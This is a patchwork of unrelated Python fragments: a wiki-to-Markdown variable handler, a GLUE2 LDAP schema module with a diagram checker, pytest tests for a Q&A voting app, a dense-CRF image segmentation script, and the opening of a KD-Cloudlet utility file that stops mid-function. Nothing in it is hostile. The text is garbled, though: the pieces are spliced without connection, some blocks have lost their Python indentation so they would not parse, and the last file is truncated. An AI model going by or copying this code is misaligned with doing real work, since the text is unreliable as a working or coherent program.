def _HandleVariable(self, input_line, match, output_stream):
    """Handle a variable.

    Args:
        input_line: Current line number being processed.
        match: Matched text.
        output_stream: Output Markdown file.
    """
    output = None
    instructions = None
    # A plugin parameter can define the variable; the innermost plugin wins.
    if self._plugin_stack:
        value = None
        for plugin_info in reversed(self._plugin_stack):
            if match in plugin_info["params"]:
                value = plugin_info["params"][match]
                break
        if value:
            output = value
    # Otherwise, fall back to the globally-defined variables.
    if not output:
        if match == "username":
            output = "(TODO: Replace with username.)"
            instructions = ("On Google Code this would have been replaced with the "
                            "username of the current user, but GitHub has no "
                            "direct support for equivalent behavior. It has been "
                            "replaced with\n\t{0}\nConsider removing this altogether."
                            .format(output))
        elif match == "email":
            output = "(TODO: Replace with email address.)"
            instructions = ("On Google Code this would have been replaced with the "
                            "email address of the current user, but GitHub has no "
                            "direct support for equivalent behavior. It has been "
                            "replaced with\n\t{0}\nConsider removing this altogether."
                            .format(output))
        elif match == "project":
            if self._project:
                output = self._project
                instructions = (u"It has been replaced with static text containing the "
                                "name of the project:\n\t{0}".format(self._project))
            else:
                output = "(TODO: Replace with project name.)"
                instructions = ("Because no project name was specified, the text has "
                                "been replaced with:\n\t{0}".format(output))
    # Not defined anywhere, just treat as regular text.
    if not output:
        # Add surrounding %% back on.
        output = u"%%{0}%%".format(match)
    self._formatting_handler.HandleEscapedText(
        input_line,
        output_stream,
        output)
    if instructions:
        self._warning_method(
            input_line,
            u"A variable substitution was performed with %%{0}%%. {1}"
            .format(match, instructions))
def _HandleTag(self, input_line, tag, output_stream):
    """Handle a tag, which has an opening and closing.

    Args:
        input_line: Current line number being processed.
        tag: The tag to handle.
        output_stream: Output Markdown file.
    """
    # An already-open tag gets closed; otherwise this occurrence opens it.
    handler = self._CloseTag if tag in self._open_tags else self._OpenTag
    handler(input_line, tag, output_stream)
|
from arcnagios.ldaputils import LDAPObject
import logging
from inspect import isclass
from utils import lazy_staticmethod
log = logging.getLogger(__name__)
# Multiplicity codes for GLUE2 foreign-key relation endpoints.
MU_1 = 0      # exactly one
MU_01 = 1     # zero or one
MU_SOME = 2   # one or more
MU_ANY = 3    # any number
MU_MINUS = 4  # unspecified

# TODO. Change to MU_SOME when the infosys is ready for it.
MU_SOME_WIP = MU_ANY

def multiplicity_indicator(m):
    """Return the UML-style symbol for multiplicity code ``m``."""
    symbols = {MU_1: '1', MU_01: '0,1', MU_ANY: '*', MU_SOME: '+',
               MU_MINUS: '-'}
    return symbols[m]

def matching_multiplicity(mult, n):
    """Return whether a link count of ``n`` satisfies multiplicity ``mult``.

    Mirrors the original fall-through: MU_MINUS (and unknown codes) yield
    None rather than a boolean.
    """
    checks = {
        MU_1: lambda count: count == 1,
        MU_01: lambda count: count in (0, 1),
        MU_SOME: lambda count: count > 0,
        MU_ANY: lambda count: True,
    }
    check = checks.get(mult)
    if check is not None:
        return check(n)
# Relation Kinds
ASSOCIATION = 1
AGGREGATION = 2
COMPOSITION = 3
# TODO: The specification of relation of the GLUE2ForeignKey objects may be
# incomplete, unspecified ones default to ASSOCIATION.
class GLUE2ForeignKey(object):
def __init__(self, name, other_class, local_mult, other_mult,
bidirectional = False, dependent_fk_attribute = False,
relation = ASSOCIATION):
self.name = name
self.other_class = other_class
self.local_mult = local_mult
self.other_mult = other_mult
self.bidirectional = bidirectional
self.dependent_fk_attribute = dependent_fk_attribute
self.relation = relation
_fk = GLUE2ForeignKey
# Auxiliary classes to be treated as structural.
# Maps each exclusive auxiliary objectclass to the structural objectclass it
# refines; an LDAP entry carrying one of these auxiliaries is instantiated
# as the corresponding specialised Python class (see
# construct_from_ldap_entry below).
glue2_exclusive_auxiliary_objectclasses = {
    'GLUE2AdminDomain': 'GLUE2Domain',
    'GLUE2UserDomain': 'GLUE2Domain',
    'GLUE2AccessPolicy': 'GLUE2Policy',
    'GLUE2MappingPolicy': 'GLUE2Policy',
    'GLUE2ComputingService': 'GLUE2Service',
    'GLUE2ComputingEndpoint': 'GLUE2Endpoint',
    'GLUE2ComputingShare': 'GLUE2Share',
    'GLUE2ComputingManager': 'GLUE2Manager',
    'GLUE2ExecutionEnvironment': 'GLUE2Resource',
    'GLUE2ComputingActivity': 'GLUE2Activity',
    'GLUE2StorageService': 'GLUE2Service',
    'GLUE2StorageEndpoint': 'GLUE2Endpoint',
    'GLUE2StorageShare': 'GLUE2Share',
    'GLUE2StorageManager': 'GLUE2Manager',
    'GLUE2DataStore': 'GLUE2Resource',
}
class GLUE2Entity(LDAPObject):
    """Base class for all GLUE2 LDAP entity classes."""
    structural_objectclass = 'GLUE2Entity'
    # Set on subclasses that are identified by an exclusive auxiliary class.
    glue2_exclusive_auxiliary_objectclass = None
    # True on classes that only serve as bases of concrete entity classes.
    glue2_really_abstract = False
    # Name of the LDAP attribute holding the primary key, if any.
    glue2_primary_key = None
    # Deferred via lazy_staticmethod so FK lists may reference classes
    # defined later in this module.
    glue2_foreign_keys = lazy_staticmethod(lambda: [])

    @classmethod
    def glue2_class_name(cls):
        """Return the GLUE2 objectclass name this Python class represents."""
        return cls.glue2_exclusive_auxiliary_objectclass \
            or cls.structural_objectclass

    @classmethod
    def glue2_check_class(cls):
        """Sanity-check the class's FK declarations and naming.

        Logs every problem found and asserts that none occurred.
        """
        error_count = 0
        log.info('+ Checking class %s.'%cls.__name__)
        for fk in cls.glue2_foreign_keys():
            log.info('++ Checking FK %s.'%fk.name)
            if not fk.dependent_fk_attribute:
                # The target must declare a primary key to link against.
                if not isinstance(fk.other_class.glue2_primary_key, str):
                    log.error('Missing primary key for %s'%fk.name)
                    error_count += 1
            if fk.bidirectional:
                # A bidirectional FK requires a reverse FK on the target
                # class pointing back at (a base of) this class.
                found = False
                for rfk in fk.other_class.glue2_foreign_keys():
                    if issubclass(cls, rfk.other_class):
                        found = True
                if not found:
                    log.error('Did not find reverse link for %s'%fk.name)
                    error_count += 1
        if cls.glue2_class_name() != cls.__name__:
            log.error('Mismatched class name %s vs %s.'
                      % (cls.glue2_class_name(), cls.__name__))
            error_count += 1
        assert error_count == 0

    @classmethod
    def glue2_all_foreign_keys(cls):
        """Yield FKs declared on this class and, recursively, on its bases."""
        for fk in cls.glue2_foreign_keys():
            yield fk
        for base in cls.__bases__:
            if issubclass(base, GLUE2Entity):
                for fk in base.glue2_all_foreign_keys():
                    yield fk

    def glue2_get_fk_links(self, fk):
        """Return this entry's value(s) for FK attribute ``fk`` as a list.

        Missing attributes yield [], scalars are wrapped in a 1-list.
        """
        v = getattr(self, fk.name)
        if isinstance(v, list):
            return v
        elif v is None:
            return []
        else:
            return [v]
# Core entity declarations: groups, extensions, locations, contacts and the
# domain hierarchy. FK lists are wrapped in lazy_staticmethod so they may
# reference classes defined further down the module.
class GLUE2Group(GLUE2Entity):
    structural_objectclass = 'GLUE2Group'
    glue2_primary_key = 'GLUE2GroupID'
    glue2_foreign_keys = lazy_staticmethod(lambda: [])

class GLUE2Extension(GLUE2Entity):
    structural_objectclass = 'GLUE2Extension'
    # An extension is composed into exactly one owning entity.
    glue2_foreign_keys = lazy_staticmethod(lambda: [
        _fk('GLUE2ExtensionEntityForeignKey', GLUE2Entity, MU_ANY, MU_1,
            dependent_fk_attribute = True, relation = COMPOSITION),
    ])

class GLUE2Location(GLUE2Entity):
    structural_objectclass = 'GLUE2Location'
    glue2_primary_key = 'GLUE2LocationID'
    glue2_foreign_keys = lazy_staticmethod(lambda: [
        _fk('GLUE2LocationServiceForeignKey', GLUE2Service, MU_01, MU_ANY),
        _fk('GLUE2LocationDomainForeignKey', GLUE2Domain, MU_01, MU_ANY),
    ])

class GLUE2Contact(GLUE2Entity):
    structural_objectclass = 'GLUE2Contact'
    glue2_primary_key = 'GLUE2ContactID'
    glue2_foreign_keys = lazy_staticmethod(lambda: [
        _fk('GLUE2ContactServiceForeignKey', GLUE2Service, MU_ANY, MU_ANY),
        _fk('GLUE2ContactDomainForeignKey', GLUE2Domain, MU_ANY, MU_ANY),
    ])

class GLUE2Domain(GLUE2Entity):
    structural_objectclass = 'GLUE2Domain'
    glue2_primary_key = 'GLUE2DomainID'
    # Abstract: only instantiated via the Admin/User specialisations below.
    glue2_really_abstract = True
    glue2_foreign_keys = lazy_staticmethod(lambda: [])

class GLUE2AdminDomain(GLUE2Domain):
    glue2_exclusive_auxiliary_objectclass = 'GLUE2AdminDomain'
    # Admin domains may be aggregated under a parent admin domain.
    glue2_foreign_keys = lazy_staticmethod(lambda: [
        _fk('GLUE2AdminDomainAdminDomainForeignKey', GLUE2AdminDomain,
            MU_ANY, MU_01, relation = AGGREGATION),
    ])

class GLUE2UserDomain(GLUE2Domain):
    glue2_exclusive_auxiliary_objectclass = 'GLUE2UserDomain'
    glue2_foreign_keys = lazy_staticmethod(lambda: [
        _fk('GLUE2UserDomainUserDomainForeignKey', GLUE2UserDomain,
            MU_ANY, MU_01, relation = AGGREGATION),
    ])
# Service-level abstractions: services, endpoints, shares, managers,
# resources, activities and policies.
class GLUE2Service(GLUE2Entity):
    structural_objectclass = 'GLUE2Service'
    glue2_primary_key = 'GLUE2ServiceID'
    glue2_foreign_keys = lazy_staticmethod(lambda: [
        _fk('GLUE2ServiceAdminDomainForeignKey', GLUE2AdminDomain,
            MU_ANY, MU_1, relation = AGGREGATION),
        _fk('GLUE2ServiceServiceForeignKey', GLUE2Service, MU_ANY, MU_ANY,
            bidirectional = True),
    ])

class GLUE2Endpoint(GLUE2Entity):
    structural_objectclass = 'GLUE2Endpoint'
    glue2_primary_key = 'GLUE2EndpointID'
    glue2_foreign_keys = lazy_staticmethod(lambda: [
        _fk('GLUE2EndpointServiceForeignKey', GLUE2Service, MU_ANY, MU_1,
            relation = AGGREGATION),
    ])

class GLUE2Share(GLUE2Entity):
    structural_objectclass = 'GLUE2Share'
    glue2_primary_key = 'GLUE2ShareID'
    glue2_really_abstract = True
    glue2_foreign_keys = lazy_staticmethod(lambda: [
        _fk('GLUE2ShareServiceForeignKey', GLUE2Service, MU_ANY, MU_1,
            relation = AGGREGATION),
        _fk('GLUE2ShareEndpointForeignKey', GLUE2Share, MU_ANY, MU_ANY),
        _fk('GLUE2ShareResourceForeignKey', GLUE2Resource, MU_ANY, MU_ANY),
    ])

class GLUE2Manager(GLUE2Entity):
    structural_objectclass = 'GLUE2Manager'
    glue2_primary_key = 'GLUE2ManagerID'
    glue2_really_abstract = True
    glue2_foreign_keys = lazy_staticmethod(lambda: [
        _fk('GLUE2ManagerServiceForeignKey', GLUE2Service, MU_ANY, MU_1,
            relation = AGGREGATION),
    ])

class GLUE2Resource(GLUE2Entity):
    structural_objectclass = 'GLUE2Resource'
    glue2_primary_key = 'GLUE2ResourceID'
    glue2_really_abstract = True
    glue2_foreign_keys = lazy_staticmethod(lambda: [
        _fk('GLUE2ResourceManagerForeignKey', GLUE2Manager, MU_ANY, MU_1,
            relation = COMPOSITION),
    ])

class GLUE2Activity(GLUE2Entity):
    structural_objectclass = 'GLUE2Activity'
    glue2_primary_key = 'GLUE2ActivityID'
    glue2_foreign_keys = lazy_staticmethod(lambda: [
        _fk('GLUE2ActivityUserDomainForeignKey', GLUE2UserDomain,
            MU_ANY, MU_01),
        _fk('GLUE2ActivityEndpointForeignKey', GLUE2Endpoint, MU_ANY, MU_01),
        _fk('GLUE2ActivityShareForeignKey', GLUE2Share, MU_ANY, MU_01),
        _fk('GLUE2ActivityResourceForeignKey', GLUE2Resource, MU_ANY, MU_01),
        _fk('GLUE2ActivityActivityForeignKey', GLUE2Activity, MU_ANY, MU_ANY,
            bidirectional = True)
    ])

class GLUE2Policy(GLUE2Entity):
    structural_objectclass = 'GLUE2Policy'
    glue2_primary_key = 'GLUE2PolicyID'
    glue2_really_abstract = True
    glue2_foreign_keys = lazy_staticmethod(lambda: [
        _fk('GLUE2PolicyUserDomainForeignKey', GLUE2UserDomain,
            MU_ANY, MU_SOME_WIP),
    ])

class GLUE2AccessPolicy(GLUE2Policy):
    glue2_exclusive_auxiliary_objectclass = 'GLUE2AccessPolicy'
    glue2_foreign_keys = lazy_staticmethod(lambda: [
        _fk('GLUE2AccessPolicyEndpointForeignKey', GLUE2Endpoint, MU_ANY, MU_1),
    ])

class GLUE2MappingPolicy(GLUE2Policy):
    glue2_exclusive_auxiliary_objectclass = 'GLUE2MappingPolicy'
    glue2_foreign_keys = lazy_staticmethod(lambda: [
        _fk('GLUE2MappingPolicyShareForeignKey', GLUE2Share, MU_ANY, MU_1),
    ])
# Computing Service
# =================
class GLUE2ComputingService(GLUE2Service):
    glue2_exclusive_auxiliary_objectclass = 'GLUE2ComputingService'
    glue2_foreign_keys = lazy_staticmethod(lambda: [])

class GLUE2ComputingEndpoint(GLUE2Endpoint):
    glue2_exclusive_auxiliary_objectclass = 'GLUE2ComputingEndpoint'
    glue2_foreign_keys = lazy_staticmethod(lambda: [])

class GLUE2ComputingShare(GLUE2Share):
    glue2_exclusive_auxiliary_objectclass = 'GLUE2ComputingShare'
    glue2_foreign_keys = lazy_staticmethod(lambda: [])

class GLUE2ComputingManager(GLUE2Manager):
    glue2_exclusive_auxiliary_objectclass = 'GLUE2ComputingManager'
    glue2_foreign_keys = lazy_staticmethod(lambda: [])

class GLUE2Benchmark(GLUE2Entity):
    structural_objectclass = 'GLUE2Benchmark'
    glue2_primary_key = 'GLUE2BenchmarkID'
    glue2_foreign_keys = lazy_staticmethod(lambda: [
        _fk('GLUE2BenchmarkComputingManagerForeignKey',
            GLUE2ComputingManager, MU_ANY, MU_01),
        _fk('GLUE2BenchmarkExecutionEnvironmentForeignKey',
            GLUE2ExecutionEnvironment, MU_ANY, MU_01),
    ])

class GLUE2ExecutionEnvironment(GLUE2Resource):
    glue2_exclusive_auxiliary_objectclass = 'GLUE2ExecutionEnvironment'
    glue2_foreign_keys = lazy_staticmethod(lambda: [])

class GLUE2ApplicationEnvironment(GLUE2Entity):
    structural_objectclass = 'GLUE2ApplicationEnvironment'
    glue2_primary_key = 'GLUE2ApplicationEnvironmentID'
    glue2_foreign_keys = lazy_staticmethod(lambda: [
        _fk('GLUE2ApplicationEnvironmentComputingManagerForeignKey',
            GLUE2ComputingManager, MU_ANY, MU_1, relation = COMPOSITION),
        _fk('GLUE2ApplicationEnvironmentExecutionEnvironmentForeignKey',
            GLUE2ExecutionEnvironment, MU_ANY, MU_ANY),
    ])

class GLUE2ApplicationHandle(GLUE2Entity):
    structural_objectclass = 'GLUE2ApplicationHandle'
    glue2_primary_key = 'GLUE2ApplicationHandleID'
    glue2_foreign_keys = lazy_staticmethod(lambda: [
        _fk('GLUE2ApplicationHandleApplicationEnvironmentForeignKey',
            GLUE2ApplicationEnvironment, MU_ANY, MU_1, relation = COMPOSITION),
    ])

class GLUE2ComputingActivity(GLUE2Activity):
    glue2_exclusive_auxiliary_objectclass = 'GLUE2ComputingActivity'
    glue2_foreign_keys = lazy_staticmethod(lambda: [])

class GLUE2ToStorageService(GLUE2Entity):
    structural_objectclass = 'GLUE2ToStorageService'
    glue2_primary_key = 'GLUE2ToStorageServiceID'
    glue2_foreign_keys = lazy_staticmethod(lambda: [
        _fk('GLUE2ToStorageServiceComputingServiceForeignKey',
            GLUE2ComputingService, MU_ANY, MU_1),
        _fk('GLUE2ToStorageServiceStorageServiceForeignKey',
            GLUE2StorageService, MU_MINUS, MU_1),
    ])

# All classes belonging to the computing side of the schema (used e.g. when
# clustering the dot diagram in check_classes).
glue2_computing_classes = [
    GLUE2ComputingService, GLUE2ComputingEndpoint, GLUE2ComputingShare,
    GLUE2ComputingManager, GLUE2Benchmark, GLUE2ExecutionEnvironment,
    GLUE2ApplicationEnvironment, GLUE2ApplicationHandle,
    GLUE2ComputingActivity, GLUE2ToStorageService
]
# Storage Service
# ===============
class GLUE2StorageService(GLUE2Service):
    glue2_exclusive_auxiliary_objectclass = 'GLUE2StorageService'
    glue2_foreign_keys = lazy_staticmethod(lambda: [])

class GLUE2StorageServiceCapacity(GLUE2Entity):
    structural_objectclass = 'GLUE2StorageServiceCapacity'
    glue2_primary_key = 'GLUE2StorageServiceCapacityID'
    glue2_foreign_keys = lazy_staticmethod(lambda: [
        _fk('GLUE2StorageServiceCapacityStorageServiceForeignKey',
            GLUE2StorageService, MU_ANY, MU_1),
    ])

class GLUE2StorageAccessProtocol(GLUE2Entity):
    structural_objectclass = 'GLUE2StorageAccessProtocol'
    glue2_primary_key = 'GLUE2StorageAccessProtocolID'
    glue2_foreign_keys = lazy_staticmethod(lambda: [
        _fk('GLUE2StorageAccessProtocolStorageServiceForeignKey',
            GLUE2StorageService, MU_ANY, MU_1, relation = AGGREGATION),
    ])

class GLUE2StorageEndpoint(GLUE2Endpoint):
    glue2_exclusive_auxiliary_objectclass = 'GLUE2StorageEndpoint'
    glue2_foreign_keys = lazy_staticmethod(lambda: [])

class GLUE2StorageShare(GLUE2Share):
    glue2_exclusive_auxiliary_objectclass = 'GLUE2StorageShare'
    glue2_foreign_keys = lazy_staticmethod(lambda: [])

class GLUE2StorageShareCapacity(GLUE2Entity):
    structural_objectclass = 'GLUE2StorageShareCapacity'
    glue2_primary_key = 'GLUE2StorageShareCapacityID'
    glue2_foreign_keys = lazy_staticmethod(lambda: [
        _fk('GLUE2StorageShareCapacityStorageShareForeignKey',
            GLUE2StorageShare, MU_ANY, MU_1, relation = AGGREGATION),
    ])

class GLUE2StorageManager(GLUE2Manager):
    glue2_exclusive_auxiliary_objectclass = 'GLUE2StorageManager'
    glue2_foreign_keys = lazy_staticmethod(lambda: [])

class GLUE2DataStore(GLUE2Resource):
    glue2_exclusive_auxiliary_objectclass = 'GLUE2DataStore'
    glue2_foreign_keys = lazy_staticmethod(lambda: [])

class GLUE2ToComputingService(GLUE2Entity):
    structural_objectclass = 'GLUE2ToComputingService'
    glue2_primary_key = 'GLUE2ToComputingServiceID'
    glue2_foreign_keys = lazy_staticmethod(lambda: [
        _fk('GLUE2ToComputingServiceStorageAccessProtocolForeignKey',
            GLUE2StorageAccessProtocol, MU_ANY, MU_ANY),
        _fk('GLUE2ToComputingServiceComputingServiceForeignKey',
            GLUE2ComputingService, MU_MINUS, MU_1),
        _fk('GLUE2ToComputingServiceStorageServiceForeignKey',
            GLUE2StorageService, MU_MINUS, MU_1),
    ])

# All classes belonging to the storage side of the schema.
glue2_storage_classes = [
    GLUE2StorageService, GLUE2StorageServiceCapacity,
    GLUE2StorageAccessProtocol, GLUE2StorageEndpoint,
    GLUE2StorageShare, GLUE2StorageShareCapacity, GLUE2StorageManager,
    GLUE2DataStore, GLUE2ToComputingService
]
# Constructor Dispatcher
# =====================
# Collect every GLUE2Entity subclass defined in this module, then index the
# classes by the GLUE2 objectclass name they represent.
# NOTE: itervalues() and list-returning filter() are Python 2 idioms; this
# module targets Python 2.
glue2_entity_classes = \
    filter(lambda c: isclass(c) and issubclass(c, GLUE2Entity),
        globals().itervalues())
glue2_entity_class_map = \
    dict((c.glue2_class_name(), c) for c in glue2_entity_classes)
def construct_from_ldap_entry(subschema, dn, ent):
    """Instantiate the GLUE2 entity class matching an LDAP entry.

    The class is chosen from the entry's exclusive auxiliary objectclass if
    present, otherwise from its structural objectclass. Returns None when no
    known class matches; raises ValueError on inconsistent objectclass
    combinations.
    """
    ocs = set(ent['objectClass'])
    exauxes = ocs.intersection(glue2_exclusive_auxiliary_objectclasses)
    if len(exauxes) > 1:
        raise ValueError('Mixing exclusive auxiliary classes %s.'
                         % ', '.join(exauxes))
    if exauxes:
        class_name = exauxes.pop()
        base_class_name = glue2_exclusive_auxiliary_objectclasses[class_name]
        # The auxiliary class only makes sense on top of its structural base.
        if base_class_name not in ocs:
            raise ValueError(
                '%s should be considered a structural subclass of %s.'
                %(class_name, base_class_name))
    else:
        class_name = ent['structuralObjectClass'][0]
    entity_class = glue2_entity_class_map.get(class_name)
    if entity_class:
        return entity_class(subschema, dn, ent)
# Validation of Classes
# =====================
# To validate the classes and dump a diagram to tmp.glue2.*, use
# python -c 'from arcnagios.glue2 import check_classes; check_classes()'
def check_classes():
    """Validate all GLUE2 classes and dump a class diagram to tmp.glue2.dot.

    Runs glue2_check_class() on every entity class, writes a Graphviz
    digraph of inheritance and FK edges, and renders it with ``dot``.

    Returns:
        The exit status of the ``dot`` invocation producing tmp.glue2.svg.
    """
    def nodename(s):
        # Strip the redundant "GLUE2" prefix from diagram node labels.
        s = s.startswith('GLUE2') and s[5:] or s
        return s
    def fklabel(cn, s):
        # Build a two-line edge label from a FK attribute name, checking
        # the FK naming conventions on the way.
        if not s.endswith('ForeignKey'):
            # BUG FIX: the format argument was missing, so the log line
            # printed a literal "%s" instead of the offending name.
            log.error('%s should end with "ForeignKey"' % s)
            return s
        if not s.startswith(cn):
            log.error('%s should start with %s'%(s, cn))
            return '"%s"'%nodename(s)
        s = s[:-10] + 'FK'
        return '"%s-\\n%s"'%(nodename(cn), s[len(cn):])
    # BUG FIX: the basicConfig keyword is "level"; "loglevel" was silently
    # ignored, so the INFO progress messages never appeared.
    logging.basicConfig(level = logging.INFO)
    # "with" guarantees the dot file is closed even if a check asserts.
    with open('tmp.glue2.dot', 'w') as dot_out:
        dot_out.write('digraph {\n'
                      ' rankdir = "BT";\n'
                      ' edge [arrowsize=1.2, fontsize=13, labelfontsize=15];\n')
        if False:  # Disabled: optionally cluster computing/storage subgraphs.
            dot_out.write(' subgraph cluster_computing {%s;}\n'
                % '; '.join(c.glue2_class_name() for c in glue2_computing_classes))
            dot_out.write(' subgraph cluster_storage {%s;}\n'
                % '; '.join(c.glue2_class_name() for c in glue2_storage_classes))
        for c in glue2_entity_classes:
            c.glue2_check_class()
            if not c is GLUE2Entity:
                # Inheritance edges: subclass -> base.
                for cp in c.__subclasses__():
                    dot_out.write(' %s -> %s;\n'
                                  %(nodename(cp.glue2_class_name()),
                                    nodename(c.glue2_class_name())))
            # FK edges, annotated with the multiplicities of both ends.
            for fk in c.glue2_foreign_keys():
                cp = fk.other_class
                dot_out.write(' %s -> %s [arrowhead=odiamond, label=%s, '
                              'taillabel="%s", headlabel="%s"];\n'
                              %(nodename(c.glue2_class_name()),
                                nodename(cp.glue2_class_name()),
                                fklabel(c.glue2_class_name(), fk.name),
                                multiplicity_indicator(fk.local_mult),
                                multiplicity_indicator(fk.other_mult)))
        dot_out.write('}\n')
    import os
    return os.system('dot -T svg -o tmp.glue2.svg tmp.glue2.dot')
|
import pytest
from ...app.models import Question, Answer, Upvote, Downvote
from ...app.schemas.answer import AnswerSchema
from ..factories import UserFactory
@pytest.mark.usefixtures('db', 'user')
class TestQuestion:
    """Tests for the Answer model: creation, votes and serialization."""

    def _make_question_and_answer(self, db, user):
        """Create a question by the ``user`` fixture and an answer by a
        fresh user.

        Returns:
            (question, answer, answering_user) tuple, all committed.
        """
        asker = user.get()
        question = Question(id_user=asker.id, text="What is the life?")
        db.session.add(question)
        db.session.commit()
        answering_user = UserFactory(username="user_answer",
                                     email="user_answer@gmail.com")
        db.session.commit()
        answer = Answer(answering_user.id, question.id, "Answer?")
        db.session.add(answer)
        db.session.commit()
        return question, answer, answering_user

    def test_create_answer_and_relationship(self, db, user):
        self._make_question_and_answer(db, user)
        assert Answer.query.count() == 1

    def test_upvote(self, db, user):
        _, answer, _ = self._make_question_and_answer(db, user)
        voters = [
            UserFactory(username="userLike1", email="userLike1@gmail.com"),
            UserFactory(username="userLike2", email="userLike2@gmail.com"),
        ]
        db.session.commit()
        for voter in voters:
            answer.upvote.append(Upvote(id_user=voter.id))
        db.session.commit()
        assert answer.upvote_count == 2
        assert answer.downvote_count == 0

    def test_downvote(self, db, user):
        _, answer, _ = self._make_question_and_answer(db, user)
        voters = [UserFactory(username="user__%d" % i,
                              email="user__%d@gmail.com" % i)
                  for i in range(1, 4)]
        db.session.commit()
        for voter in voters:
            answer.downvote.append(Downvote(id_user=voter.id))
        db.session.commit()
        assert answer.downvote_count == 3
        assert answer.upvote_count == 0

    def test_check_not_error_if_question_and_answer_have_votes(self, db, user):
        question, answer, _ = self._make_question_and_answer(db, user)
        u1, u2, u3, u4, u5 = [UserFactory(username="user__%d" % i,
                                          email="user__%d@gmail.com" % i)
                              for i in range(1, 6)]
        db.session.commit()
        # The same users may vote on both the question and the answer.
        for voter in (u1, u2, u3):
            answer.downvote.append(Downvote(id_user=voter.id))
        for voter in (u1, u2):
            answer.upvote.append(Upvote(id_user=voter.id))
        for voter in (u2, u5, u4, u3):
            question.upvote.append(Upvote(id_user=voter.id))
        for voter in (u1, u2):
            question.downvote.append(Downvote(id_user=voter.id))
        db.session.commit()
        assert answer.downvote_count == 3
        assert answer.upvote_count == 2
        assert question.downvote_count == 2
        assert question.upvote_count == 4

    def test_serialization_with_marshmallow(self, db, user):
        question, answer, answering_user = \
            self._make_question_and_answer(db, user)
        voters = [UserFactory(username="user__%d" % i,
                              email="user__%d@gmail.com" % i)
                  for i in range(1, 4)]
        db.session.commit()
        for voter in voters:
            answer.downvote.append(Downvote(id_user=voter.id))
        for voter in voters[:2]:
            answer.upvote.append(Upvote(id_user=voter.id))
        db.session.commit()
        # marshmallow 2.x API: dump() returns a MarshalResult with .data.
        serialized = AnswerSchema().dump(answer).data
        assert serialized['upvote_count'] == 2
        assert serialized['downvote_count'] == 3
        assert serialized['id_question'] == question.id
        assert serialized['text'] == "Answer?"
        assert serialized['user']['id'] == answering_user.id
        assert serialized['user']['username'] == answering_user.username
        assert serialized['user']['email'] == answering_user.email
import pydensecrf.densecrf as dcrf
import numpy as np
import sys
from skimage.io import imread, imsave
from pydensecrf.utils import unary_from_labels, create_pairwise_bilateral, create_pairwise_gaussian, unary_from_softmax
from os import listdir, makedirs
from os.path import isfile, join
# Load the image and its annotation mask.
img = imread('00006.jpg')
anno_rgb = imread('00006_anno.jpg').astype(np.uint32)
# Normalise the annotation to [0, 1] for use as a soft foreground score.
min_val = np.min(anno_rgb.ravel())
max_val = np.max(anno_rgb.ravel())
out = (anno_rgb.astype('float') - min_val) / (max_val - min_val)
# Two-class soft label map: channel 1 = foreground, channel 0 = background.
# NOTE(review): this assumes the annotation decodes to a single-channel
# (H, W) array; a 3-channel JPEG would make `out` (H, W, 3) and break the
# assignments below — confirm the input file.
labels = np.zeros((2, img.shape[0], img.shape[1]))
labels[1, :, :] = out
labels[0, :, :] = 1 - out
# Lookup table mapping label index {0, 1} to output intensity {0, 255}.
colors = [0, 255]
colorize = np.empty((len(colors), 1), np.uint8)
colorize[:,0] = colors
n_labels = 2
# Dense CRF over all pixels, unaries from the soft labels.
# NOTE(review): unary_from_softmax takes -log of the probabilities; exact
# 0/1 entries in `out` produce infinite unaries — confirm this is intended.
crf = dcrf.DenseCRF(img.shape[1] * img.shape[0], n_labels)
U = unary_from_softmax(labels)
crf.setUnaryEnergy(U)
# Location-only (Gaussian) pairwise term: encourages local smoothness.
feats = create_pairwise_gaussian(sdims=(3, 3), shape=img.shape[:2])
crf.addPairwiseEnergy(feats, compat=3,
                      kernel=dcrf.DIAG_KERNEL,
                      normalization=dcrf.NORMALIZE_SYMMETRIC)
# This creates the color-dependent features and then add them to the CRF
feats = create_pairwise_bilateral(sdims=(50, 50), schan=(10, 10, 10),
                                  img=img, chdim=2)
crf.addPairwiseEnergy(feats, compat=5,
                      kernel=dcrf.DIAG_KERNEL,
                      normalization=dcrf.NORMALIZE_SYMMETRIC)
# Run 5 mean-field iterations and take the per-pixel argmax label.
Q = crf.inference(5)
MAP = np.argmax(Q, axis=0)
MAP = colorize[MAP]
# Write the colorized segmentation back at the annotation's shape.
imsave('seg.jpg', MAP.reshape(anno_rgb.shape))
|
# KVM-based Discoverable Cloudlet (KD-Cloudlet)
# Copyright (c) 2015 Carnegie Mellon University.
# All Rights Reserved.
#
# THIS SOFTWARE IS PROVIDED "AS IS," WITH NO WARRANTIES WHATSOEVER. CARNEGIE MELLON UNIVERSITY EXPRESSLY DISCLAIMS TO THE FULLEST EXTENT PERMITTEDBY LAW ALL EXPRESS, IMPLIED, AND STATUTORY WARRANTIES, INCLUDING, WITHOUT LIMITATION, THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE, AND NON-INFRINGEMENT OF PROPRIETARY RIGHTS.
#
# Released under a modified BSD license, please see license.txt for full terms.
# DM-0002138
#
# KD-Cloudlet includes and/or makes use of the following Third-Party Software subject to their own licenses:
# MiniMongo
# Copyright (c) 2010-2014, Steve Lacy
# All rights reserved. Released under BSD license.
# https://github.com/MiniMongo/minimongo/blob/master/LICENSE
#
# Bootstrap
# Copyright (c) 2011-2015 Twitter, Inc.
# Released under the MIT License
# https://github.com/twbs/bootstrap/blob/master/LICENSE
#
# jQuery JavaScript Library v1.11.0
# http://jquery.com/
# Includes Sizzle.js
# http://sizzlejs.com/
# Copyright 2005, 2014 jQuery Foundation, Inc. and other contributors
# Released under the MIT license
# http://jquery.org/license
__author__ = 'jdroot'
json_lib = True
try:
import json
except ImportError:
try:
import simplejson as json
except ImportError:
json_lib = False
import base64
import calendar
import datetime
import functools
import re
import urllib

import bson
from bson import RE_TYPE
from bson.binary import Binary
from bson.code import Code
from bson.dbref import DBRef
from bson.max_key import MaxKey
from bson.min_key import MinKey
from bson.objectid import ObjectId
from bson.py3compat import PY3, binary_type, string_types
from bson.timestamp import Timestamp

from pymongo.cursor import Cursor
#############################################################################################################
# Decodes a URL encoded body with json data, parsing it and putting it into a dict.
#############################################################################################################
def encoded_json_to_dict(url_encoded_data):
    """Decode a URL-encoded JSON request body and parse it into a dict.

    NOTE(review): ``urllib.unquote`` exists only on Python 2; on Python 3
    this would be ``urllib.parse.unquote`` — confirm the target interpreter.
    """
    parsed_json_string = urllib.unquote(url_encoded_data)
    # Presumably strips a trailing '=' left over from form encoding
    # (``payload=``-style bodies) — TODO confirm against the callers.
    if parsed_json_string.endswith("="):
        parsed_json_string = parsed_json_string[:-1]
